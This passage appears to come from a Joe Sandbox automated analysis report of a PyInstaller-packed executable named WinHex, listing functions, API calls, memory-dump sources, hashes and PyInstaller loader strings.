                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 918212764-0
                                                                                                                        • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction ID: 7f84b207762393e0da70931c21209f796c4f0b4e6740b92b39732c4e705dcdc2
                                                                                                                        • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                        • Instruction Fuzzy Hash: 6521D411B1864341FA55BF64A45827D9B95EF85FB0F8C4235DA2E477C2CEAEE8458320
                                                                                                                        Function 00007FF7C5BEB37C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: ce9b52f680c1b5a7cbc95938458c13a1dbec8158119413affe32dcc0b3335035
                                                                                                                        • Instruction ID: 35dacee28abefbcd11c2bd441af806b340a66bea57243c50de132c44f9a3e408
                                                                                                                        • Opcode Fuzzy Hash: ce9b52f680c1b5a7cbc95938458c13a1dbec8158119413affe32dcc0b3335035
                                                                                                                        • Instruction Fuzzy Hash: 0B41B33291864287EA34EF15A541279FBA1FF95F60F980131D78E876D1CFAEE402C761
                                                                                                                        Function 00007FF7C5BD7200 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 840049012-0
                                                                                                                        • Opcode ID: b0a3f97d720b08f5889a39697c224726df5d2ea433a547051867bce8317cd2b0
                                                                                                                        • Instruction ID: f9029f1aedb994ba8513785c98b00821a53c21dc28c6a6041eafdea3ce852fae
                                                                                                                        • Opcode Fuzzy Hash: b0a3f97d720b08f5889a39697c224726df5d2ea433a547051867bce8317cd2b0
                                                                                                                        • Instruction Fuzzy Hash: CE218021B0969246EA25BF12A5047FAEA51BF46FF4FC84430EE0D0778ACE7EE1468710
                                                                                                                        Function 00007FF7C5BEAE0C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 47f2cb7360056a46563935c31beadd7a45ae652dec1b657f4a22353b163fa2db
                                                                                                                        • Instruction ID: afe9989a40fbfc9a811d4372325bb61adb1e58dd3b264937697e3877ef257c18
                                                                                                                        • Opcode Fuzzy Hash: 47f2cb7360056a46563935c31beadd7a45ae652dec1b657f4a22353b163fa2db
                                                                                                                        • Instruction Fuzzy Hash: 3631AC22A1865681E711BF16D845378AEA4EF41FB0F994235EA2D033D2DFFEE8418735
                                                                                                                        Function 00007FF7C5BE54C8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                        • Instruction ID: 3ac4e5fb17272ac3c8b08fb0766f5a9dac207aac5e7224356ef6c6fd78033216
                                                                                                                        • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                        • Instruction Fuzzy Hash: 87118121A0C68581EA60BF51A5002BDEAB0EF85FA0FCC4431EA4C57BDBDFBED4008721
                                                                                                                        Function 00007FF7C5BF575C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                        • Instruction ID: 816946d6421794b5987b37afffad9e23aaf7e05f017d089b6da10ca491bf399f
                                                                                                                        • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                                                                                        • Instruction Fuzzy Hash: BB218736A1864287DB61EF18E580379BBA0EB94FA4F944334E75D476D6DF3ED4018B10
                                                                                                                        Function 00007FF7C5BDF61C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                        • Instruction ID: 5092cf26da32d19d1441e371903370e4b46849957e3df034fe220a95304ebb47
                                                                                                                        • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                        • Instruction Fuzzy Hash: 81016161A0874241EA04BF569901069EB95FB95FF0F888631DE6C57FEEDE7EE4018710
                                                                                                                        Function 00007FF7C5BEDD40 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF7C5BEA8B6,?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E), ref: 00007FF7C5BEDD95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4292702814-0
                                                                                                                        • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                        • Instruction ID: 87885ec7231771447e8083fe397e0d81a619237f8b73c0b200f7d6bbf5105289
                                                                                                                        • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                                                                                        • Instruction Fuzzy Hash: B4F06298B1960345FE947F6659123B5CA945F84F60FCCD538C90D862D2DDDEE4808130
                                                                                                                        Function 00007FF7C5BECACC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7C5BDFE44,?,?,?,00007FF7C5BE1356,?,?,?,?,?,00007FF7C5BE2949), ref: 00007FF7C5BECB0A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4292702814-0
                                                                                                                        • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                        • Instruction ID: 7583f8be73bbb83cfa9c412ddaef84718c29f90ecf4238bfe9ebfae4fca002a3
                                                                                                                        • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                                                                                        • Instruction Fuzzy Hash: CDF05805B1964B84FE247FB25801275DA804F68FB0F8C1730DD2E862C2EEAEF8818130

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00007FF7C5BD1B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                        • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                        • API String ID: 2446303242-1601438679
                                                                                                                        • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                        • Instruction ID: f631c94b6a1c0207a1b09a17969da1ce33fc1d155a3652c6334549b8cce226d2
                                                                                                                        • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                                                                                        • Instruction Fuzzy Hash: 81A17C36218B8187E718DF25E55479AB770F788BA4F904225DB8D03B24CF7EE169CB50
                                                                                                                        Function 00007FF7C5BDB69C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3140674995-0
                                                                                                                        • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                        • Instruction ID: 4713945cdd1906d7c8c7bc5915bb3be2ba625873c985400eba8b89c3b30ae9d8
                                                                                                                        • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                                                                                        • Instruction Fuzzy Hash: FB319276609B8186EB64AF64E8803EDB760FB84B54F844439DA4D47B98DF3DD648C720
                                                                                                                        Function 00007FF7C5BE9AE4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1239891234-0
                                                                                                                        • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                        • Instruction ID: d6c8a278e01a2a02b2eea0cb11e3abb9b318e181d0f06f287b4a8ba6150a7183
                                                                                                                        • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                                                                                        • Instruction Fuzzy Hash: 3131B536618F8186DB64DF25E8402EEB7A4FB89BA4F940135EA8D43B98DF3DD145CB10
                                                                                                                        Function 00007FF7C5BF09B4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2227656907-0
                                                                                                                        • Opcode ID: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                                                                                        • Instruction ID: d6acf46428400c98a204882c37be66e16f7c109233322c6065f2b5cdbf820259
                                                                                                                        • Opcode Fuzzy Hash: 1a8060551746b007c23963201f19a9fa9ddec40a19b74045b76b4ab8f762ca91
                                                                                                                        • Instruction Fuzzy Hash: A3B1B53AB1969A41EA60AF26D4001B9EB91EF44FF4FC44231EE5E07BA5DE3DE445C320
                                                                                                                        Function 00007FF7C5BD3DF0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                        • API String ID: 190572456-3109299426
                                                                                                                        • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction ID: bd422602f46fafa73c35be0ef28e080ed92d7510197824d4d6252bdd787b257f
                                                                                                                        • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction Fuzzy Hash: C142BA69A0DB0791EA59EF18B850174EBA1BF44FB4BC45235C90E062A8FF7EF5598330
                                                                                                                        Function 00007FF7C5BD55D0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
